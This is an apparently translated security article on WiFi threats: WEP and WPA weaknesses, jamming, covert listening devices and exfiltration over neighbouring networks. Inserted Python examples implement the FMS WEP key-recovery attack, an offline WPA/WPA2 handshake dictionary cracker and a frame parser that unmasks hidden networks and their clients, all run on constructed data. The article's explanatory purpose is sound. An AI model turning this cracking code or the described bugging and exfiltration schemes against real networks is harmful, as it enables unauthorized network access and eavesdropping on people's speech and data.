Wi-Fi networks and threats to information security.
Dmitry Ivanovich Belorusov
Mikhail Sergeevich Koreshkov
«RICOM» Moscow
The article examines the direct and indirect threats to information security that arise from the spread of WiFi wireless access technology. It shows that WiFi can threaten not only information transmitted over WiFi equipment itself, but also speech inside the facility.
The widespread use of wireless data networks based on the IEEE 802.11 family of standards, better known as WiFi, cannot fail to attract the attention of information security specialists. In this article the authors acquaint readers with the results of their research into new threats to the information security of a facility that are associated with WiFi networks.
Initially, WiFi technology was aimed at organizing fast Internet access points (hotspots) for mobile users. It allows a large number of subscribers to access the Internet simultaneously, primarily in public places (airports, restaurants, etc.). The advantages of wireless access are obvious, all the more so because WiFi quickly became a de facto standard, and compatibility between access points and the mobile devices of different manufacturers is not in question.
Gradually, WiFi networks spread to large and small offices to organize intra-corporate networks or subnets.
At the same time, large telecom operators began to develop their own services for providing paid wireless Internet access based on WiFi technology. Such networks consist of a large number of access points that organize coverage areas of entire city districts, similar to cellular communications.
As a result, at present, in any large city, next to almost any object, there are at least several WiFi networks with their own access points and clients, the number of which can reach hundreds.
Let's move on to considering the threats to information security that arise in connection with the use of WiFi networks. All threats can be conditionally divided into two classes:
- direct — threats to information security that arise when transmitting information via the IEEE 802.11 wireless interface;
- indirect — threats associated with the presence of a large number of WiFi networks at and near the facility, which can be used to transmit information, including information obtained without authorization.
Indirect threats are relevant for absolutely all organizations, and, as will be shown below, they pose a danger not only to information processed in computer networks, but also, most importantly, to voice information.
Let's consider direct threats. To organize a wireless communication channel in WiFi technology, a radio interface for data transmission is used. As a channel for transmitting information, it is potentially subject to unauthorized interference with the purpose of intercepting, distorting or blocking information.
When developing WiFi technology, some information security issues were taken into account, however, as practice shows, not enough.
Numerous «holes» in WiFi security gave rise to a separate pastime in the hacking scene, the so-called wardriving: driving around with a laptop and a WiFi adapter to locate and map other people's networks and, frequently, to break into them. Wardrivers do this for «sport», which, however, does not diminish the danger of the threat.
Although WiFi technology provides authentication and encryption to protect traffic from interception at the channel layer, these security elements do not work effectively enough.
Firstly, on early equipment enabling encryption noticeably reduced the throughput of the channel, and administrators often disabled it deliberately to «optimize» traffic. Secondly, the WEP encryption still common in WiFi networks has long been discredited because of weaknesses in the key scheduling algorithm of the RC4 cipher on which WEP is built: WEP seeds RC4 with a 24-bit initialization vector (IV) sent in the clear, followed by the secret key, and for certain «weak» IVs the first keystream byte leaks information about the key. Numerous programs exploit this. The attack is named FMS after the initials of its authors (Fluhrer, Mantin and Shamir). Each packet with a weak IV reveals the next byte of the secret key with a probability of about 5%, so the total number of packets the attacker needs depends largely on luck; on average about six million encrypted packets are required. h1kari of Dachb0den Labs strengthened the FMS algorithm, reducing the required number of packets from six million to 500 thousand, and in some cases a 40/104-bit key can be cracked with only three thousand packets, which allows attacking even home access points without loading them with excessive traffic.
If the data exchange between legitimate clients and the access point is small or practically absent, an attacker can force the victim to generate a large amount of traffic without knowing the secret key: it is enough to intercept a suitable packet (an encrypted ARP request is the classic choice) and retransmit it unchanged, without decrypting it; every reply carries a fresh IV.
Hardware developers responded quite adequately by changing the algorithm for generating initialization vectors so that weak IVs no longer occur.
In August 2004 a hacker known as KoreK published the source code of a new cryptanalyzer whose statistical attacks do not depend on weak IVs at all. To recover a 40-bit key he needed only 200,000 packets with unique IVs, and 500,000 for a 104-bit key. Packets with unique IVs make up on average about 95% of all encrypted packets, so recovering the key takes the attacker very little time.
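The FMS attack described above, simulated end to end as an added example (this is not code from the article or from any of the tools it mentions). WEP seeds RC4 with the IV followed by the secret key, and because the first plaintext byte of every WEP data frame is the fixed SNAP header byte 0xAA, a sniffer learns the first keystream byte of every captured frame. The 40-bit key, the set of weak-IV frames and the vote-and-verify search are all constructed inline; a real attacker would pick the same weak IVs out of millions of captured frames.

```python
"""Added example: the FMS weak-IV attack on WEP in pure Python.
The secret key and the frame set below are constructed, not captured."""
from collections import Counter

def ksa(key, steps=256):
    """Run the RC4 key-scheduling algorithm for `steps` rounds and return
    the (partial) state table S together with the final value of j."""
    S = list(range(256))
    j = 0
    for i in range(steps):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S, j

def rc4_first_byte(key):
    """First keystream byte RC4 produces for `key` (full KSA + one PRGA step)."""
    S, _ = ksa(key)
    j = S[1]
    S[1], S[j] = S[j], S[1]
    return S[(S[1] + S[j]) & 0xFF]

def fms_vote(iv, z, known):
    """One FMS vote for the next secret key byte, or None if this IV does not
    leave the KSA in the 'resolved' state.  `known` holds the secret bytes
    recovered so far, so key bytes 0..B+2 (IV || known) are known to the attacker."""
    B = len(known)
    S, j = ksa(list(iv) + list(known), B + 3)
    if S[1] >= B + 3 or (S[1] + S[S[1]]) & 0xFF != B + 3:
        return None
    # With ~5 % probability the positions involved survive the rest of the KSA
    # untouched; then z == S[B+3] after the next round, which yields this guess:
    return (S.index(z) - j - S[B + 3]) & 0xFF

def fms_recover(packets, key_len, width=3):
    """Byte-by-byte FMS voting over (iv, first keystream byte) pairs.  The
    `width` best-voted candidates per byte are tried depth-first and every
    complete key is verified against the capture, which rescues the odd byte
    where noise outvotes the true value."""
    def search(known):
        if len(known) == key_len:
            key = bytes(known)
            return key if all(rc4_first_byte(iv + key) == z for iv, z in packets) else None
        votes = Counter()
        for iv, z in packets:
            g = fms_vote(iv, z, known)
            if g is not None:
                votes[g] += 1
        for cand, _ in votes.most_common(width):
            found = search(known + [cand])
            if found:
                return found
        return None
    return search([])

def weak_iv_packets(secret):
    """Constructed capture: for every key byte B, all 256 IVs of the classic
    weak form (B+3, 0xFF, X), each paired with the keystream byte it leaks."""
    packets = []
    for B in range(len(secret)):
        for x in range(256):
            iv = bytes([B + 3, 0xFF, x])
            packets.append((iv, rc4_first_byte(iv + secret)))
    return packets

SECRET = bytes.fromhex("1a2b3c4d5e")  # constructed 40-bit WEP key

if __name__ == "__main__":
    pk = weak_iv_packets(SECRET)
    print("recovered:", fms_recover(pk, len(SECRET)).hex(), "true:", SECRET.hex())
```

With 256 weak IVs per key byte only about 13 of them vote for the right value, but the wrong votes are spread over 255 other values, so the right byte wins almost always; the verification step against the whole capture catches the rare tie.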
Newer WiFi equipment uses WPA (WiFi Protected Access), which once again raised the security of wireless devices. WEP was replaced by TKIP (Temporal Key Integrity Protocol), which derives per-packet keys from a temporal key that is changed at short intervals. Despite the relative novelty of this technology, hacker utilities already include a module that attacks it: in the common WPA-Personal (pre-shared key) mode all session keys are derived from a passphrase, and an attacker who captures the four-way handshake of any client can test passphrases offline, without interacting with the access point, until the handshake's integrity check matches. A guessable passphrase turns out to be quite sufficient for an unauthorized connection to an access point protected by WPA.
The IEEE 802.11i standard describes a more advanced security system (known as WPA2), based on the AES cipher (CCMP). There are no ready-made utilities for breaking the cipher itself, so for the time being one can feel reasonably safe with this technology, with one important caveat: in pre-shared key mode WPA2 is exposed to exactly the same offline dictionary attack on the passphrase as WPA, because the key derivation and the handshake are the same. The strength of AES does not help if the passphrase is weak.
The threat of blocking the WiFi channel was practically ignored during the development of the technology, which was a mistake. Of course, blocking the channel is not dangerous in itself, since WiFi networks are almost always auxiliary, but blocking is often only a preparatory stage for a man-in-the-middle attack, in which a third device appears between the client and the access point and redirects their traffic through itself. In that case there is a threat not only of interception of information but also of its distortion. Several well-documented denial-of-service (DoS) attacks on WiFi networks are known, but within this article we will not dwell on them and limit ourselves to noting that the threats are real.
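The offline passphrase attack on WPA/WPA2-Personal, worked through as an added example (not code from the article or from any tool it names). The pre-shared key is PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes) as specified in IEEE 802.11i; the pairwise transient key is expanded from it with the two MAC addresses and the two nonces that the four-way handshake sends in the clear; message 2 of the handshake carries a MIC computed with the first 16 bytes of that PTK. Anyone holding a capture of the handshake can therefore rebuild the MIC for each candidate passphrase and compare. The SSID, MAC addresses, nonces, passphrase and wordlist are constructed values; the only real-world constant checked is the 802.11i test vector for the PSK derivation.

```python
"""Added example: offline dictionary attack on a captured WPA-PSK handshake.
All network parameters below are constructed; nothing here is a real capture."""
import hashlib
import hmac
import struct

# EAPOL header (4) + descriptor type (1) + key info (2) + key length (2)
# + replay counter (8) + nonce (32) + IV (16) + RSC (8) + ID (8) = offset of the MIC
MIC_OFFSET = 81

def wpa_psk(passphrase: str, ssid: str) -> bytes:
    """PSK (= PMK) of a WPA-Personal network, as in IEEE 802.11i."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512 'Pairwise key expansion' from 802.11i; returns the 64-byte PTK."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]

def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key MIC over an EAPOL-Key frame whose MIC field is zeroed.  Key-descriptor
    version 1 (WPA/TKIP) uses HMAC-MD5, version 2 (WPA2/CCMP) HMAC-SHA1-128."""
    version = struct.unpack(">H", frame[5:7])[0] & 0x7
    algo = hashlib.md5 if version == 1 else hashlib.sha1
    return hmac.new(kck, frame, algo).digest()[:16]

def build_msg2(snonce: bytes, version: int = 2) -> bytes:
    """Constructed EAPOL-Key message 2 (client -> AP) with the MIC field zeroed."""
    key_info = 0x0108 | version        # MIC bit (0x100), pairwise (0x8), descriptor version
    body = (bytes([2]) + struct.pack(">HH", key_info, 0) + b"\x00" * 8 + snonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + b"\x00" * 16 + struct.pack(">H", 0))
    return bytes([1, 3]) + struct.pack(">H", len(body)) + body

def crack_handshake(ssid, aa, spa, anonce, snonce, msg2, wordlist):
    """Offline attack: rebuild the MIC for every candidate passphrase and compare
    it with the captured one.  Returns the matching passphrase or None."""
    target = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = msg2[:MIC_OFFSET] + b"\x00" * 16 + msg2[MIC_OFFSET + 16:]
    for candidate in wordlist:
        kck = ptk(wpa_psk(candidate, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, zeroed), target):
            return candidate
    return None

# Constructed network and handshake parameters (illustrative values only).
SSID = "office-ap"
AA = bytes.fromhex("001122334455")      # access point MAC (authenticator)
SPA = bytes.fromhex("66778899aabb")     # client MAC (supplicant)
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
REAL_PASSPHRASE = "sunshine1"

def captured_msg2() -> bytes:
    """Simulate the client's message 2 as a monitor-mode sniffer would see it."""
    frame = build_msg2(SNONCE)
    kck = ptk(wpa_psk(REAL_PASSPHRASE, SSID), AA, SPA, ANONCE, SNONCE)[:16]
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]

WORDLIST = ["password", "letmein", "sunshine", "sunshine1", "qwerty123"]  # constructed

if __name__ == "__main__":
    print("PSK('password', 'IEEE') =", wpa_psk("password", "IEEE").hex())
    print("recovered passphrase:",
          crack_handshake(SSID, AA, SPA, ANONCE, SNONCE, captured_msg2(), WORDLIST))
```

Nothing in this loop touches the access point, and the cost per guess is one PBKDF2 run with 4096 iterations, so the only defence in pre-shared key mode is a passphrase that is not in any wordlist; WPA and WPA2 are identical here, only the MIC algorithm selected by the key-descriptor version differs.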
Let us move on to considering indirect threats to the information security of an object that are directly related to WiFi technology.
WiFi network channels are extremely attractive for use as a transport infrastructure for devices for unauthorized acquisition of information for a number of reasons:
1. WiFi signals have a fairly complex structure and a wide spectrum, so neither the signals nor, all the more so, the WiFi devices around the facility can be identified by conventional radio monitoring means.
As practice has shown, reliable detection of a WiFi signal by modern wide-band radio monitoring systems is possible only by signal energy, with parallel analysis bands several tens of MHz wide, a scan rate of at least 400 MHz/s, and only in the near zone. Signals from access points located in the far zone are below the receiver noise floor.
Detection of WiFi transmitters by sequential scanning with narrow-band receivers is generally impossible.
2. Almost every facility, or its immediate vicinity, has private or public WiFi networks. Among such networks it is extremely difficult to distinguish the legal clients of one's own and neighboring networks from clients capable of covertly extracting information, which makes it possible to hide an unauthorized transmission effectively among legitimate WiFi channels.
The WiFi transmitter emits a so-called «OFDM signal» (in 802.11a/g; the older 802.11b uses direct-sequence spread spectrum, which is just as wide). This means that at any moment the device transmits, within one signal occupying a wide band (about 20 MHz), several dozen information-carrying subcarriers located so close to each other that a conventional receiver sees the signal as a single «dome». Only a special receiver can separate the subcarriers in such a «dome» and identify the transmitting devices.
3. In large cities, public WiFi networks have a coverage area sufficient to guarantee a connection for transmitting information from almost any point. This eliminates the need for a mobile reception point near the facility, since an unauthorized device can send information through a public access point and then over the Internet to any location.
4. The capacity of WiFi channels allows sound, data and video to be transmitted in real time. This opens up wide opportunities for information interception devices: not only sound, but also video and data from computers or a local network are now under threat.
From the standpoint of protecting information at a facility, every advantage of WiFi listed above is a disadvantage. In addition, small WiFi devices that transmit data, voice or video, for example wireless WiFi video cameras, are produced and sold entirely legally, and they can easily be adapted for covert acquisition of information.
Fig. 1. WiFi transmitter signal in the near zone
Fig. 2. Wireless web camera with WiFi interface
Next, we will consider practical implementations of indirect threats using real examples of the use of WiFi-devices for unauthorized acquisition of information.
1. An unauthorized WiFi video camera with a microphone is installed in the premises. To extend the transmission range, a WiFi access point operating in repeater mode (one of the standard operating modes of an access point) with a directional antenna is installed on the roof of the facility. In this case, information from the room in which the camera (with the standard transmit power of a WiFi client) is installed can be received at a control point several kilometers from the facility, even in urban conditions.
2. The smartphone of one of the company's employees can be switched by a special program (malware) into a mode in which speech picked up by the microphone is recorded and transmitted to the control point over the built-in WiFi module.
To increase stealth, the control point can also use one of the standard access point modes, «hidden network name» (SSID broadcast disabled). In that case the access point is invisible to the ordinary programs that list available wireless networks; WiFi clients are never shown by such programs at all. It should be kept in mind, however, that this is concealment only from casual observation: a sniffer with its adapter in monitor mode still sees the hidden access point's beacons (with an empty name field), the clients exchanging data with it, and the name itself in probe responses and association requests.
3. Finally, consider the case where the regime at the facility does not allow storage media to be taken out, and there is no Internet access or it is restricted. How can an attacker move a fairly large volume of data out of such a facility unnoticed? Answer: he connects, entirely legally, to a neighboring open WiFi network and transfers the information, remaining unnoticed among the many clients of neighboring networks that transmit information out of the facility.
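What a monitor-mode sniffer sees that the «available networks» list does not, shown on three constructed 802.11 frames as an added example (not code from the article and not a real capture): a beacon from an access point with SSID broadcast disabled (zero-length SSID element), a probe response from the same access point, which carries the real name, and a data frame from a client talking to it. The MAC addresses, the network name and the frame contents are all invented for the illustration; the frame layout follows the 802.11 header and information-element format.

```python
"""Added example: minimal 802.11 frame parser that exposes a 'hidden' AP,
recovers its SSID from a probe response and lists its clients.
All frames below are constructed in this file, not captured."""
import struct

BEACON, PROBE_RESP, DATA = (0, 8), (0, 5), (2, 0)   # (type, subtype)

def mac(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)

def parse_frame(frame: bytes) -> dict:
    """Decode frame control, the address roles and, for management frames,
    the information elements; returns a dict describing the frame."""
    fc0, fc1 = frame[0], frame[1]
    ftype, subtype = (fc0 >> 2) & 0x3, fc0 >> 4
    to_ds, from_ds = fc1 & 0x1, (fc1 >> 1) & 0x1
    a1, a2, a3 = frame[4:10], frame[10:16], frame[16:22]
    info = {"type": (ftype, subtype), "to_ds": to_ds, "from_ds": from_ds}
    if ftype == 0:                       # management: a1=DA, a2=SA, a3=BSSID
        info["bssid"], info["sa"] = mac(a3), mac(a2)
        ies, pos = {}, 24 + 12           # header + timestamp/interval/capability
        while pos + 2 <= len(frame):
            eid, ln = frame[pos], frame[pos + 1]
            ies[eid] = frame[pos + 2:pos + 2 + ln]
            pos += 2 + ln
        info["ssid"] = ies.get(0, b"").decode("utf-8", "replace")
    elif ftype == 2:                     # data: address roles depend on the DS bits
        if to_ds and not from_ds:        # client -> AP
            info["bssid"], info["client"] = mac(a1), mac(a2)
        elif from_ds and not to_ds:      # AP -> client
            info["bssid"], info["client"] = mac(a2), mac(a1)
    return info

def survey(frames):
    """Correlate frames per BSSID: whether the AP hides its name, the name
    leaked by probe responses, and the client MACs seen in data frames."""
    aps = {}
    for f in map(parse_frame, frames):
        if "bssid" not in f:
            continue
        ap = aps.setdefault(f["bssid"], {"hidden": False, "ssid": "", "clients": set()})
        if f["type"] == BEACON:
            ap["hidden"] = f["ssid"] == ""
            ap["ssid"] = ap["ssid"] or f["ssid"]
        elif f["type"] == PROBE_RESP and f["ssid"]:
            ap["ssid"] = f["ssid"]      # the 'hidden' name leaks here
        elif "client" in f:
            ap["clients"].add(f["client"])
    return aps

def mgmt_frame(subtype, da, sa, bssid, ssid):
    """Build a management frame carrying a single SSID element (constructed)."""
    hdr = bytes([subtype << 4, 0]) + b"\x00\x00" + da + sa + bssid + b"\x00\x00"
    fixed = b"\x00" * 8 + struct.pack("<HH", 100, 0x0411)   # timestamp, interval, capability
    return hdr + fixed + bytes([0, len(ssid)]) + ssid.encode()

def data_frame(bssid, client, da):
    """Client-to-AP data frame (To DS = 1); body omitted (constructed)."""
    return bytes([0x08, 0x01]) + b"\x00\x00" + bssid + client + da + b"\x00\x00"

AP = bytes.fromhex("00aabbccddee")       # constructed access point MAC
CLIENT = bytes.fromhex("021122334455")   # constructed client MAC
BCAST = b"\xff" * 6

SAMPLE = [                                            # constructed, not captured
    mgmt_frame(8, BCAST, AP, AP, ""),                 # beacon with the SSID hidden
    mgmt_frame(5, CLIENT, AP, AP, "office-hidden"),   # probe response leaks the SSID
    data_frame(AP, CLIENT, BCAST),                    # client data frame
]

if __name__ == "__main__":
    for bssid, ap in survey(SAMPLE).items():
        print(bssid, ap)
```

The network-list programs mentioned above only display networks whose beacons carry a name, which is exactly the element the «hidden name» mode blanks; everything else in the three frames, including the addresses that identify the access point and its client, is transmitted in the clear and is parsed here from the raw bytes.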
Fig. 3. Indirect threat model
Conclusions:
WiFi technology is certainly a convenient and universal way of organizing wireless access to information. However, it carries a number of serious threats to the information security of a facility, which fall into direct and indirect ones. Whereas direct threats can be eliminated by refusing to use WiFi devices in the corporate network infrastructure and by not using WiFi networks at the facility, indirect threats exist regardless of whether WiFi is used at the facility. Moreover, indirect threats are more dangerous than direct ones, since they affect not only information in computer networks but also speech at the facility.
In conclusion, we would like to note that WiFi is currently not the only widespread wireless data transmission technology that can pose threats to the information security of a facility.
Bluetooth devices can also be used to organize unauthorized wireless data transmission. Compared to WiFi, Bluetooth devices have significantly fewer capabilities in terms of data transmission range and channel capacity, but they have one important advantage — low power consumption, which is extremely important for an unauthorized transmitter.
Another technology that is beginning to compete with WiFi in providing wireless broadband access is WiMAX. However, as of today, WiMAX devices are much less common, and their presence is more likely to be a revealing factor than to hide an unauthorized information transmission channel.
Thus, WiFi is currently not only the most common wireless access technology, but also the most convenient one for unauthorized reception and transmission of information.
Literature
- Karolik A., Kaspersky K. Let's figure out what wardriving is all about // Hacker (Xakep). No. 59. http://xakep.ru/magazine/xs/059/008/1.asp
- «Zodiac» software and hardware complex for monitoring WiFi networks.